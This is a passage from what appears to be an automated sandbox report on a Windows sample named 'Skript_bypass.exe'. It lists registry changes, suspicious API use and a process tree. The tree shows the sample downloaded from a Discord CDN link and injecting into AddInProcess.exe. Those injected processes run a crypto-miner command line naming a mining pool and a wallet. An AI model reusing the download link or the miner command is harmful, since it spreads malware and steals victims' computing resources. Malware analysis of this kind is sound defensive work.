Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "820" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "9903" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "9903" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2979" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\MuiCache SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2979" SearchApp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exetaskmgr.exepid process 4732 chrome.exe 4732 chrome.exe 1072 chrome.exe 1072 chrome.exe 1968 chrome.exe 1968 chrome.exe 3772 chrome.exe 3772 chrome.exe 1316 chrome.exe 1316 chrome.exe 4764 chrome.exe 4764 chrome.exe 4444 chrome.exe 4444 chrome.exe 4444 chrome.exe 4444 chrome.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 1220 taskmgr.exe -
Suspicious behavior: LoadsDriver 13 IoCs
Processes:
pid process 648 648 648 648 648 648 648 648 648 648 648 648 648 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
chrome.exepid process 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskmgr.exeSkript_bypass.exeSkript_bypass.exeSkript_bypass.exetaskmgr.exeAddInProcess.exeAddInProcess.exetaskmgr.exeAddInProcess.exetaskmgr.exeAddInProcess.exetaskmgr.exeAddInProcess.exetaskmgr.exeAddInProcess.exetaskmgr.exeAddInProcess.exetaskmgr.exetaskmgr.exeAddInProcess.exedescription pid process Token: SeDebugPrivilege 1220 taskmgr.exe Token: SeSystemProfilePrivilege 1220 taskmgr.exe Token: SeCreateGlobalPrivilege 1220 taskmgr.exe Token: SeDebugPrivilege 1920 Skript_bypass.exe Token: SeDebugPrivilege 2180 Skript_bypass.exe Token: SeDebugPrivilege 1804 Skript_bypass.exe Token: 33 1220 taskmgr.exe Token: SeIncBasePriorityPrivilege 1220 taskmgr.exe Token: SeDebugPrivilege 724 taskmgr.exe Token: SeSystemProfilePrivilege 724 taskmgr.exe Token: SeCreateGlobalPrivilege 724 taskmgr.exe Token: SeLockMemoryPrivilege 4988 AddInProcess.exe Token: SeLockMemoryPrivilege 4988 AddInProcess.exe Token: 33 724 taskmgr.exe Token: SeIncBasePriorityPrivilege 724 taskmgr.exe Token: SeLockMemoryPrivilege 1380 AddInProcess.exe Token: SeLockMemoryPrivilege 1380 AddInProcess.exe Token: SeDebugPrivilege 4892 taskmgr.exe Token: SeSystemProfilePrivilege 4892 taskmgr.exe Token: SeCreateGlobalPrivilege 4892 taskmgr.exe Token: 33 4892 taskmgr.exe Token: SeIncBasePriorityPrivilege 4892 taskmgr.exe Token: SeLockMemoryPrivilege 4648 AddInProcess.exe Token: SeLockMemoryPrivilege 4648 AddInProcess.exe Token: SeDebugPrivilege 4344 taskmgr.exe Token: SeSystemProfilePrivilege 4344 taskmgr.exe Token: SeCreateGlobalPrivilege 4344 taskmgr.exe Token: 33 4344 taskmgr.exe Token: SeIncBasePriorityPrivilege 4344 taskmgr.exe Token: SeLockMemoryPrivilege 4312 AddInProcess.exe Token: SeLockMemoryPrivilege 4312 AddInProcess.exe Token: SeDebugPrivilege 4228 taskmgr.exe Token: SeSystemProfilePrivilege 4228 taskmgr.exe Token: SeCreateGlobalPrivilege 4228 taskmgr.exe Token: 33 4228 taskmgr.exe Token: SeIncBasePriorityPrivilege 4228 taskmgr.exe Token: SeLockMemoryPrivilege 2416 AddInProcess.exe Token: SeLockMemoryPrivilege 2416 AddInProcess.exe Token: SeDebugPrivilege 4952 taskmgr.exe Token: SeSystemProfilePrivilege 4952 taskmgr.exe Token: SeCreateGlobalPrivilege 4952 taskmgr.exe Token: 33 4952 taskmgr.exe Token: SeIncBasePriorityPrivilege 4952 taskmgr.exe Token: SeLockMemoryPrivilege 1920 AddInProcess.exe Token: SeLockMemoryPrivilege 1920 AddInProcess.exe Token: SeDebugPrivilege 3012 taskmgr.exe Token: SeSystemProfilePrivilege 3012 taskmgr.exe Token: SeCreateGlobalPrivilege 3012 taskmgr.exe Token: 33 3012 taskmgr.exe Token: SeIncBasePriorityPrivilege 3012 taskmgr.exe Token: SeLockMemoryPrivilege 2312 AddInProcess.exe Token: SeLockMemoryPrivilege 2312 AddInProcess.exe Token: SeDebugPrivilege 3688 taskmgr.exe Token: SeSystemProfilePrivilege 3688 taskmgr.exe Token: SeCreateGlobalPrivilege 3688 taskmgr.exe Token: 33 3688 taskmgr.exe Token: SeIncBasePriorityPrivilege 3688 taskmgr.exe Token: SeDebugPrivilege 4240 taskmgr.exe Token: SeSystemProfilePrivilege 4240 taskmgr.exe Token: SeCreateGlobalPrivilege 4240 taskmgr.exe Token: 33 4240 taskmgr.exe Token: SeIncBasePriorityPrivilege 4240 taskmgr.exe Token: SeLockMemoryPrivilege 548 AddInProcess.exe Token: SeLockMemoryPrivilege 548 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe 1220 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
SearchApp.exepid process 4428 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 1072 wrote to memory of 2016 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 2016 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 1764 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4732 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4732 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe PID 1072 wrote to memory of 4768 1072 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://cdn.discordapp.com/attachments/1014859922669830164/1046043972184842260/Skript_bypass.exe1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe36f74f50,0x7ffe36f74f60,0x7ffe36f74f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2008 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2988 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2980 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5396 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5536 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4684 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5500 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5836 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5456 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5912 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4632 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1076 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4976 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,17009148323385851801,15450137751432363772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5668 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Downloads\Skript_bypass.exe"C:\Users\Admin\Downloads\Skript_bypass.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\Skript_bypass.exe"C:\Users\Admin\Downloads\Skript_bypass.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x45c256155B89e2B970D7ECb42135cc537079790b.Worker_CPU -p x --cpu-max-threads-hint=502⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x45c256155B89e2B970D7ECb42135cc537079790b.Worker_CPU -p x --cpu-max-threads-hint=502⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x45c256155B89e2B970D7ECb42135cc537079790b.Worker_CPU -p x --cpu-max-threads-hint=502⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x45c256155B89e2B970D7ECb42135cc537079790b.Worker_CPU -p x --cpu-max-threads-hint=502⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x45c256155B89e2B970D7ECb42135cc537079790b.Worker_CPU -p x --cpu-max-threads-hint=502⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x45c256155B89e2B970D7ECb42135cc537079790b.Worker_CPU -p x --cpu-max-threads-hint=502⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x45c256155B89e2B970D7ECb42135cc537079790b.Worker_CPU -p x --cpu-max-threads-hint=502⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x45c256155B89e2B970D7ECb42135cc537079790b.Worker_CPU -p x --cpu-max-threads-hint=502⤵
- Suspicious use of AdjustPrivilegeToken
-
